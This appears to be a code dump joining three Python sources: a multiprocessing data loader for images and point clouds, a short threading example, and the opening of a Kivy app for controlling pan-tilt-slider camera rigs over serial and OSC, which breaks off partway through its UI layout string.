self.batch_size = batch_size
self.observations = observations
self.actions = actions
self.shuffle = shuffle
self.queue = Queue(max_queue_len)
self.process = None
self.load_images = isinstance(observations[0], str)
self.backend = backend
self.sequential = sequential
self.start_idx = 0
if start_process:
self.start_process()
def start_process(self):
"""Start preprocessing process"""
# Skip if in sequential mode
if self.sequential:
return
self.process = Process(target=self._run)
# Make it a deamon, so it will be deleted at the same time
# of the main process
self.process.daemon = True
self.process.start()
@property
def _minibatch_indices(self):
"""
Current minibatch indices given the current pointer
(start_idx) and the minibatch size
:return: (np.ndarray) 1D array of indices
"""
return self.indices[self.start_idx:self.start_idx + self.batch_size]
def sequential_next(self):
"""
Sequential version of the pre-processing.
"""
if self.start_idx > len(self.indices):
raise StopIteration
if self.start_idx == 0:
if self.shuffle:
# Shuffle indices
np.random.shuffle(self.indices)
obs = self.observations[self._minibatch_indices]
if self.load_images:
obs = np.concatenate([self._make_batch_element(image_path) for image_path in obs],
axis=0)
actions = self.actions[self._minibatch_indices]
self.start_idx += self.batch_size
return obs, actions
def _run(self):
start = True
with Parallel(n_jobs=self.n_workers, batch_size="auto", backend=self.backend) as parallel:
while start or self.infinite_loop:
start = False
if self.shuffle:
np.random.shuffle(self.indices)
for minibatch_idx in range(self.n_minibatches):
self.start_idx = minibatch_idx * self.batch_size
obs = self.observations[self._minibatch_indices]
if self.load_images:
if self.n_workers <= 1:
obs = [self._make_batch_element(image_path)
for image_path in obs]
else:
obs = parallel(delayed(self._make_batch_element)(image_path)
for image_path in obs)
if len(obs) == 0:
continue
obs = np.concatenate(obs, axis=0)
actions = self.actions[self._minibatch_indices]
self.queue.put((obs, actions))
# Free memory
del obs
self.queue.put(None)
@classmethod
def _make_batch_element(cls, image_path, is_pc=True):
"""
Process one element.
:param image_path: (str) path to an image
:param pc_path: (str) path to point cloud
:return: (np.ndarray)
"""
if is_pc:
pc_data = np.load(image_path)
pc = pc_data["obs"]
pc = np.expand_dims(pc, axis=0)
return pc
# cv2.IMREAD_UNCHANGED is needed to load
# grey and RGBa images
image = cv2.imread(image_path, cv2.IMREAD_UNCHANGED)
# Grey image
if len(image.shape) == 2:
image = image[:, :, np.newaxis]
if image is None:
raise ValueError("Tried to load {}, but it was not found".format(image_path))
# Convert from BGR to RGB
if image.shape[-1] == 3:
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = image.reshape((1,) + image.shape)
return image
def __len__(self):
return self.n_minibatches
def __iter__(self):
self.start_idx = 0
self.indices = self.original_indices.copy()
return self
def __next__(self):
if self.sequential:
return self.sequential_next()
if self.process is None:
raise ValueError("You must call .start_process() before using the dataloader")
while True:
try:
val = self.queue.get_nowait()
break
except queue.Empty:
time.sleep(0.001)
continue
if val is None:
raise StopIteration
return val
def __del__(self):
if self.process is not None:
self.process.terminate()
|
threading_simple.py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (c) 2008 Doug Hellmann All rights reserved.
#
"""Creating and waiting for a thread.
"""
#end_pymotw_header
import threading
def worker():
"""thread worker function"""
print('Worker')
threads = []
for i in range(5):
t = threading.Thread(target=worker)
threads.append(t)
t.start()
|
PTSApp.py
|
#macOS
#Kivy
#python3 -m pip install "kivy[base] @ https://github.com/kivy/kivy/archive/master.zip"
#
#KivyMD
#git clone https://github.com/kivymd/KivyMD.git --depth 1
#cd KivyMD
#pip install .
#
#Other
#python3 -m pip install pygame==2.0.1
#python3 -m pip install usbserial4a
#python3 -m pip install python-osc
#python3 -m pip install pyserial
#python3 -m pip install pyjnius
#python3 -m pip install pynput
#python3 -m pip install pyinstaller
#macOS
#pyinstaller --onefile --windowed --icon PTSApp-Icon.icns --osx-bundle-identifier 'com.bradders' --name PTSApp PTSApp.py
#
#Windows
#pyinstaller --onefile --windowed --icon="PTSApp-Icon.ico" PTSApp.py
import asyncio
import threading
from kivy.app import App
from kivy.clock import mainthread
from kivy.event import EventDispatcher
from kivy.lang import Builder
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.popup import Popup
from kivy.uix.textinput import TextInput
from kivy.utils import platform
from kivy.core.window import Window
from kivy.config import Config
if platform == 'android':
Config.set('graphics', 'fullscreen', 'auto')
Config.set('graphics', 'window_state', 'maximized')
Config.write()
else:
Config.set('graphics', 'fullscreen', '0')
Config.set('graphics', 'window_state', 'windowed')
#Config.set('graphics', 'width', '1900') #test
#Config.set('graphics', 'height', '1000') #test
Config.set('graphics', 'width', '1340') # A7 Lite
Config.set('graphics', 'height', '703') # A7 Lite
#Config.set('graphics', 'width', '2000') # A7
#Config.set('graphics', 'height', '1092') # A7
Config.set('kivy','window_icon','PTSApp-Icon.png')
Config.write()
#Window.size = (1340, 800) # A7 - 2000 x 1200 # A7 Lite - 1340 x 800 (0.8775)
from kivy.lang import Builder
from kivy.clock import mainthread
from kivy.clock import Clock
from kivy.utils import get_color_from_hex
from kivy.properties import NumericProperty
#from pynput.keyboard import Listener
from kivy.uix.button import Button
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.behaviors.focus import FocusBehavior
from kivymd.app import MDApp
import threading
import os, sys
import time
from pathlib import Path
from pythonosc.osc_server import AsyncIOOSCUDPServer
from pythonosc.udp_client import SimpleUDPClient
from pythonosc.dispatcher import Dispatcher
window_sizes=Window.size
xDivSet = window_sizes[0] * 0.007462686567
yDivSet = window_sizes[1] * 0.01422475107
xScreenSet = window_sizes[0]
yScreenSet = window_sizes[1]
Cam1TextColour = '55FF55'
Cam2TextColour = '9DDDFF'
Cam3TextColour = 'FFFF55'
Cam1ButColour = '#208020'
Cam2ButColour = '#405C80'
Cam3ButColour = '#807100'
cam1Pos1Set = False
cam1Pos2Set = False
cam1Pos3Set = False
cam1Pos4Set = False
cam1Pos5Set = False
cam1Pos6Set = False
cam1Pos1Run = False
cam1Pos2Run = False
cam1Pos3Run = False
cam1Pos4Run = False
cam1Pos5Run = False
cam1Pos6Run = False
cam1AtPos1 = False
cam1AtPos2 = False
cam1AtPos3 = False
cam1AtPos4 = False
cam1AtPos5 = False
cam1AtPos6 = False
cam2Pos1Set = False
cam2Pos2Set = False
cam2Pos3Set = False
cam2Pos4Set = False
cam2Pos5Set = False
cam2Pos6Set = False
cam2Pos1Run = False
cam2Pos2Run = False
cam2Pos3Run = False
cam2Pos4Run = False
cam2Pos5Run = False
cam2Pos6Run = False
cam2AtPos1 = False
cam2AtPos2 = False
cam2AtPos3 = False
cam2AtPos4 = False
cam2AtPos5 = False
cam2AtPos6 = False
cam3Pos1Set = False
cam3Pos2Set = False
cam3Pos3Set = False
cam3Pos4Set = False
cam3Pos5Set = False
cam3Pos6Set = False
cam3Pos1Run = False
cam3Pos2Run = False
cam3Pos3Run = False
cam3Pos4Run = False
cam3Pos5Run = False
cam3Pos6Run = False
cam3AtPos1 = False
cam3AtPos2 = False
cam3AtPos3 = False
cam3AtPos4 = False
cam3AtPos5 = False
cam3AtPos6 = False
OLDcam1Pos1Set = False
OLDcam1Pos2Set = False
OLDcam1Pos3Set = False
OLDcam1Pos4Set = False
OLDcam1Pos5Set = False
OLDcam1Pos6Set = False
OLDcam1AtPos1 = False
OLDcam1AtPos2 = False
OLDcam1AtPos3 = False
OLDcam1AtPos4 = False
OLDcam1AtPos5 = False
OLDcam1AtPos6 = False
OLDcam1Pos1Run = False
OLDcam1Pos2Run = False
OLDcam1Pos3Run = False
OLDcam1Pos4Run = False
OLDcam1Pos5Run = False
OLDcam1Pos6Run = False
OLDcam2Pos1Set = False
OLDcam2Pos2Set = False
OLDcam2Pos3Set = False
OLDcam2Pos4Set = False
OLDcam2Pos5Set = False
OLDcam2Pos6Set = False
OLDcam2AtPos1 = False
OLDcam2AtPos2 = False
OLDcam2AtPos3 = False
OLDcam2AtPos4 = False
OLDcam2AtPos5 = False
OLDcam2AtPos6 = False
OLDcam2Pos1Run = False
OLDcam2Pos2Run = False
OLDcam2Pos3Run = False
OLDcam2Pos4Run = False
OLDcam2Pos5Run = False
OLDcam2Pos6Run = False
OLDcam3Pos1Set = False
OLDcam3Pos2Set = False
OLDcam3Pos3Set = False
OLDcam3Pos4Set = False
OLDcam3Pos5Set = False
OLDcam3Pos6Set = False
OLDcam3AtPos1 = False
OLDcam3AtPos2 = False
OLDcam3AtPos3 = False
OLDcam3AtPos4 = False
OLDcam3AtPos5 = False
OLDcam3AtPos6 = False
OLDcam3Pos1Run = False
OLDcam3Pos2Run = False
OLDcam3Pos3Run = False
OLDcam3Pos4Run = False
OLDcam3Pos5Run = False
OLDcam3Pos6Run = False
cam1SliderSpeed = 1
cam2SliderSpeed = 1
cam3SliderSpeed = 1
oldCam1Speed = 9
oldCam2Speed = 9
oldCam3Speed = 9
cam1PTSpeed = 1
cam2PTSpeed = 1
cam3PTSpeed = 1
oldCam1PTSpeed = 9
oldCam2PTSpeed = 9
oldCam3PTSpeed = 9
SetPosToggle = False
whichCamSerial = 1
interval = 0.2
previousTicks = time.time() + interval
PTJoy = (0, 0)
abs_coord_x = None
abs_coord_y = None
abs_coords = None
arr = []
oldAxisX = 0
oldAxisY = 0
oldAxisZ = 0
axisX = 0
axisY = 0
axisZ = 0
data = bytearray(8)
hat = ()
oldHatX = 0
oldHatY = 0
previousTime = time.time()
currentMillisMoveCheck = time.time()
previousMillisMoveCheck = time.time()
moveCheckInterval = 0.3
whichCamRead = 1
mousePTClick = False
mouseSlClick = False
doKeyControl = True
doKeyControlA = False
doKeyControlD = False
doKeyControlW = False
doKeyControlS = False
PTKeyChange = False
doKeyControlSL = False
doKeyControlSR = False
SlKeyChange = False
mouseMoving = False
panKeyPressed = False
tiltKeyPressed = False
sliderKeyPressed = False
cam1isZooming = False
cam1isRecording = False
cam2isZooming = False
cam2isRecording = False
cam3isZooming = False
cam3isRecording = False
isZooming = False
clearWhichCam = 1
btn_scan_show = False
btn_help_show = False
longestSerial = 0
device = None
device_name = None
USBrequsted = False
whichCamOSC = 1
whileLoopRun = True
serialLoop = True
moveType = 3
moveTypeOld = 0
resetButtons = False
msg = ''
if platform == 'android':
from usb4a import usb
from usbserial4a import serial4a
else:
from serial.tools import list_ports
from serial import Serial
KV = """
#:import get_color_from_hex kivy.utils.get_color_from_hex
MDScreen:
md_bg_color: get_color_from_hex("#21282D")
canvas:
# Joystick
Color:
rgba: get_color_from_hex("#7D0000") # Red
Rectangle:
pos: (app.xDiv*1.6), (app.yDiv*25.3)
size: (app.xDiv*36.8), (app.yDiv*44)
Color:
rgba: get_color_from_hex("#444444") # Grey
#Speed Border
#PT
Rectangle:
pos: (app.xDiv*50.5), (app.yDiv*0.5)
size: (app.xDiv*18), (app.yDiv*23)
#Slider
Rectangle:
pos: (app.xDiv*71.5), (app.yDiv*0.5)
size: (app.xDiv*18), (app.yDiv*23)
#Zoom
Rectangle:
pos: (app.xDiv*92.5), (app.yDiv*0.5)
size: (app.xDiv*13), (app.yDiv*23)
#Background Colour
Color:
rgba: (0.1, 0.1, 0.1, 1) # Dark Grey BG
#Joy PT Background
Rectangle:
pos: (app.xDiv*2), (app.yDiv*33)
size: (app.xDiv*36), (app.yDiv*36)
#Joy Slider Background
Rectangle:
pos: (app.xDiv*2), (app.yDiv*25.6)
size: (app.xDiv*36), (app.yDiv*7)
#Cam1 Speed BG
Rectangle:
pos: (app.xDiv*55), (app.yDiv*17)
size: (app.xDiv*9), (app.yDiv*6)
Rectangle:
pos: (app.xDiv*76), (app.yDiv*17)
size: (app.xDiv*9), (app.yDiv*6)
#Cam2 Speed BG
Rectangle:
pos: (app.xDiv*55), (app.yDiv*9)
size: (app.xDiv*9), (app.yDiv*6)
Rectangle:
pos: (app.xDiv*76), (app.yDiv*9)
size: (app.xDiv*9), (app.yDiv*6)
#Cam3 Speed BG
Rectangle:
pos: (app.xDiv*55), (app.yDiv*1)
size: (app.xDiv*9), (app.yDiv*6)
Rectangle:
pos: (app.xDiv*76), (app.yDiv*1)
size: (app.xDiv*9), (app.yDiv*6)
#Cam1 Speed Zoom
Rectangle:
pos: (app.xDiv*97), (app.yDiv*17)
size: (app.xDiv*4), (app.yDiv*6)
#Cam2 Speed Zoom
Rectangle:
pos: (app.xDiv*97), (app.yDiv*9)
size: (app.xDiv*4), (app.yDiv*6)
#Cam3 Speed Zoom
Rectangle:
pos: (app.xDiv*97), (app.yDiv*1)
size: (app.xDiv*4), (app.yDiv*6)
FloatLayout:
id: cam1PTSpd
sizPT1: 0, 0
canvas:
Color:
rgba: get_color_from_hex("#7D0000")
Rectangle:
pos: (app.xDiv*55), (app.yDiv*17)
size: self.sizPT1
FloatLayout:
id: cam2PTSpd
sizPT2: 0, 0
canvas:
Color:
rgba: get_color_from_hex("#7D0000")
Rectangle:
pos: (app.xDiv*55), (app.yDiv*9)
size: self.sizPT2
FloatLayout:
id: cam3PTSpd
sizPT3: 0, 0
canvas:
Color:
rgba: get_color_from_hex("#7D0000")
Rectangle:
pos: (app.xDiv*55), (app.yDiv*1)
size: self.sizPT3
FloatLayout:
id: cam1SlSpd
sizSl1: 0, 0
canvas:
Color:
rgba: get_color_from_hex("#7D0000")
Rectangle:
pos: (app.xDiv*76), (app.yDiv*17)
size: self.sizSl1
FloatLayout:
id: cam2SlSpd
sizSl2: 0, 0
canvas:
Color:
rgba: get_color_from_hex("#7D0000")
Rectangle:
pos: (app.xDiv*76), (app.yDiv*9)
size: self.sizSl2
FloatLayout:
id: cam3SlSpd
sizSl3: 0, 0
canvas:
Color:
rgba: get_color_from_hex("#7D0000")
Rectangle:
pos: (app.xDiv*76), (app.yDiv*1)
size: self.sizSl3
ScrollView:
# Serial Read
id: scroll_view
always_overscroll: False
pos: (app.xDiv*50), (app.yDiv*25)
size: (app.xDiv*83), (app.yDiv*40)
size_hint: None, None
do_scroll_x: False
do_scroll_y: True
canvas.before:
Color:
rgba: (0.1, 0.1, 0.1, 1)
Rectangle:
pos: self.pos
size: self.size
Color:
rgba: get_color_from_hex("#333333")
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Label:
id: txtInput_read
font_name: "RobotoMono-Regular"
size_hint: None, None
size: self.texture_size
padding: 5, 2
halign: "left"
valign: "top"
markup: True
text: ''
FloatLayout:
id: helpCanvas
visible: False
opacity: 1 if self.visible else 0
helpRGB: (0.2, 0.2, 0.2, 1)
canvas:
Color:
rgb: self.helpRGB
Rectangle:
pos: (app.xDiv*76), (app.yDiv*25)
size: (app.xDiv*45), (app.yDiv*40)
Label:
id: helpLabel
visible: False
font_name: "RobotoMono-Regular"
font_size: '13dp' #(app.yDiv*1.4)
pos: (app.xDiv*59), (app.yDiv*14)
size_hint: None, None
size: (app.xDiv*80), (app.yDiv*60)
#size_hint_x: 1 if self.visible else 0
opacity: 1 if self.visible else 0
halign: "left"
valign: "top"
markup: True
text: 'OSC Server Port: 6503\\nOSC Client Port: 1337\\n\\nSerial Text Commands:\\ns(int) = Pan speed (º/s)\\nS(int) = Tilt speed (º/s)\\na(int) = Slide speed (mm/s)\\n\\nq(float) = Pan accel\\nQ(float) = Tilt accel\\nw(float) = Slide accel\\n\\ne(int) = Joystick pan accel factor (1 = 100%)\\nE(int) = Joystick tilt accel factor (1 = 100%)\\nD(int) = Joystick slide accel factor (1 = 100%)\\n\\nd(int) = Slide speed increments\\nf(int) = Slide min speed limit\\nF(int) = Slide max speed limit\\n\\nU = Save to EEPROM\\n'
ScrollView:
id: scanDD
pos: app.xScreen, app.yScreen
size: (app.xDiv*30), app.yScreen
size_hint: None, None
do_scroll_x: False
BoxLayout:
id: box_list
orientation: 'vertical'
on_parent: app.uiDict['box_list'] = self
size: (app.xDiv*25), (app.yDiv*6)
size_hint: None, None
height: max(self.parent.height, self.minimum_height)
FloatLayout:
TextInput:
id: textInput
pos: (app.xDiv*122), (app.yDiv*61)
size: (app.xDiv*10), (app.yDiv*3)
size_hint: None, None
#Label:
# id: OSCSend
# font_name: "RobotoMono-Regular"
# pos: (app.xDiv*45), (app.yDiv*65.7)
# size_hint: None, None
# size: (app.xDiv*8), (app.yDiv*6)
# halign: "left"
# valign: "top"
# markup: True
# text: 'Test'
#Label:
# id: OSCRec
# font_name: "RobotoMono-Regular"
# pos: (app.xDiv*45), (app.yDiv*63.7)
# size_hint: None, None
# size: (app.xDiv*8), (app.yDiv*6)
# halign: "left"
# valign: "top"
# markup: True
# text: 'Test2'
Button:
id: btnL10
pos: (app.xDiv*3), (app.yDiv*48)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:"10"
on_press: app.joyL10()
Button:
id: btnL1
pos: (app.xDiv*10), (app.yDiv*48)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:".1"
on_press: app.joyL1()
Button:
id: btnR1
pos: (app.xDiv*24), (app.yDiv*48)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:".1"
on_press: app.joyR1()
Button:
id: btnR10
pos: (app.xDiv*31), (app.yDiv*48)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:"10"
on_press: app.joyR10()
Button:
id: btnU10
pos: (app.xDiv*17), (app.yDiv*62)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:"10"
on_press: app.joyU10()
Button:
id: btnU1
pos: (app.xDiv*17), (app.yDiv*55)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:".1"
on_press: app.joyU1()
Button:
id: btnD1
pos: (app.xDiv*17), (app.yDiv*41)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:".1"
on_press: app.joyD1()
Button:
id: btnD10
pos: (app.xDiv*17), (app.yDiv*34)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:"10"
on_press: app.joyD10()
Button:
id: btnSL100
pos: (app.xDiv*3), (app.yDiv*26)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:"100"
on_press: app.joySL100()
Button:
id: btnSL10
pos: (app.xDiv*10), (app.yDiv*26)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:"10"
on_press: app.joySL10()
Button:
id: btnSR10
pos: (app.xDiv*24), (app.yDiv*26)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:"10"
on_press: app.joySR10()
Button:
id: btnSR100
pos: (app.xDiv*31), (app.yDiv*26)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
text:"100"
on_press: app.joySR100()
Button:
id: PTJoyDotPress
pos: (app.xDiv*18), (app.yDiv*49)
size: (app.xDiv*4), (app.yDiv*4)
size_hint: None, None
background_normal: ''
background_down: ''
background_color: get_color_from_hex("#7D0000")
text: ''
on_press: app.PTJoyDotPressed()
Button:
id: PTJoyDot
pos: app.xScreen, app.yScreen
size: (app.xDiv*4), (app.yDiv*4)
size_hint: None, None
background_normal: ''
background_down: ''
background_color: get_color_from_hex("#7D0000")
text: ''
Button:
id: SlJoyDotPress
pos: (app.xDiv*18), (app.yDiv*27)
size: (app.xDiv*4), (app.yDiv*4)
size_hint: None, None
background_normal: ''
background_down: ''
background_color: get_color_from_hex("#7D0000")
text: ''
on_press: app.SlJoyDotPressed()
Button:
id: SlJoyDot
pos: app.xScreen, app.yScreen
size: (app.xDiv*4), (app.yDiv*4)
size_hint: None, None
background_normal: ''
background_down: ''
background_color: get_color_from_hex("#7D0000")
text: ''
Button:
id: setPos
pos: (app.xDiv*39.5), (app.yDiv*27)
size: (app.xDiv*9), (app.yDiv*4)
size_hint: None, None
font_size: (app.yDiv*2)
text:"Set Pos"
background_normal: ''
background_color: get_color_from_hex("#666666")
on_press: app.setPos(3)
Button:
id: btnCam1Go1
text:"1"
pos: (app.xDiv*1), (app.yDiv*17)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.Cam1Go1()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam1Go2
text:"2"
pos: (app.xDiv*9), (app.yDiv*17)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.Cam1Go2()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam1Go3
text:"3"
pos: (app.xDiv*17), (app.yDiv*17)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.Cam1Go3()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam1Go4
text:"4"
pos: (app.xDiv*25), (app.yDiv*17)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.Cam1Go4()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam1Go5
text:"5"
pos: (app.xDiv*33), (app.yDiv*17)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.Cam1Go5()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam1Go6
text:"6"
pos: (app.xDiv*41), (app.yDiv*17)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.Cam1Go6()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam1PT-
text: "PT\\n-"
halign: 'center'
pos: (app.xDiv*51), (app.yDiv*17)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.sendCam1PTSpeedDec()
Button:
id: btnCam1PT+
text: "PT\\n+"
halign: 'center'
pos: (app.xDiv*64), (app.yDiv*17)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.sendCam1PTSpeedInc()
Button:
id: btnCam1Sl-
text: "Sl\\n-"
halign: 'center'
pos: (app.xDiv*72), (app.yDiv*17)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.sendCam1SliderSpeedDec()
Button:
id: btnCam1Sl+
text: "Sl\\n+"
halign: 'center'
pos: (app.xDiv*85), (app.yDiv*17)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.sendCam1SliderSpeedInc()
Button:
id: btnCam1Zm-
text:"Zm\\nOUT"
halign: 'center'
pos: (app.xDiv*93), (app.yDiv*17)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.sendCam1ZoomOut()
#on_release: app.sendCam1ZoomStop()
Button:
id: btnCam1Zm+
text:"Zm\\nIN"
halign: 'center'
pos: (app.xDiv*101), (app.yDiv*17)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.sendCam1ZoomIn()
#on_release: app.sendCam1ZoomStop()
Button:
id: cam1Record
pos: (app.xDiv*110), (app.yDiv*18)
size: (app.xDiv*11), (app.yDiv*4)
size_hint: None, None
font_size: (app.yDiv*2)
text: "Record"
background_normal: ''
background_color: get_color_from_hex("#666666")
on_press: app.sendCam1RecordToggle()
Button:
id: btnCam1Clr
text:"Clear"
pos: (app.xDiv*126), (app.yDiv*17)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.sendClearCam1Pos()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam2Go1
text:"1"
pos: (app.xDiv*1), (app.yDiv*9)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.Cam2Go1()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam2Go2
text:"2"
pos: (app.xDiv*9), (app.yDiv*9)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.Cam2Go2()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam2Go3
text:"3"
pos: (app.xDiv*17), (app.yDiv*9)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.Cam2Go3()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam2Go4
text:"4"
pos: (app.xDiv*25), (app.yDiv*9)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.Cam2Go4()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam2Go5
text:"5"
pos: (app.xDiv*33), (app.yDiv*9)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.Cam2Go5()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam2Go6
text:"6"
pos: (app.xDiv*41), (app.yDiv*9)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.Cam2Go6()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam2PT-
text: "PT\\n-"
halign: 'center'
pos: (app.xDiv*51), (app.yDiv*9)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.sendCam2PTSpeedDec()
Button:
id: btnCam2PT+
text: "PT\\n+"
halign: 'center'
pos: (app.xDiv*64), (app.yDiv*9)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.sendCam2PTSpeedInc()
Button:
id: btnCam2Sl-
text: "Sl\\n-"
halign: 'center'
pos: (app.xDiv*72), (app.yDiv*9)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.sendCam2SliderSpeedDec()
Button:
id: btnCam2Sl+
text: "Sl\\n+"
halign: 'center'
pos: (app.xDiv*85), (app.yDiv*9)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.sendCam2SliderSpeedInc()
Button:
id: btnCam2Zm-
text:"Zm\\nOUT"
halign: 'center'
pos: (app.xDiv*93), (app.yDiv*9)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.sendCam2ZoomOut()
#on_release: app.sendCam2ZoomStop()
Button:
id: btnCam2Zm+
text:"Zm\\nIN"
halign: 'center'
pos: (app.xDiv*101), (app.yDiv*9)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.sendCam2ZoomIn()
#on_release: app.sendCam2ZoomStop()
Button:
id: cam2Record
#size_hint: 0.08, 0.056
#pos_hint: {'x':.825, 'y':.15}
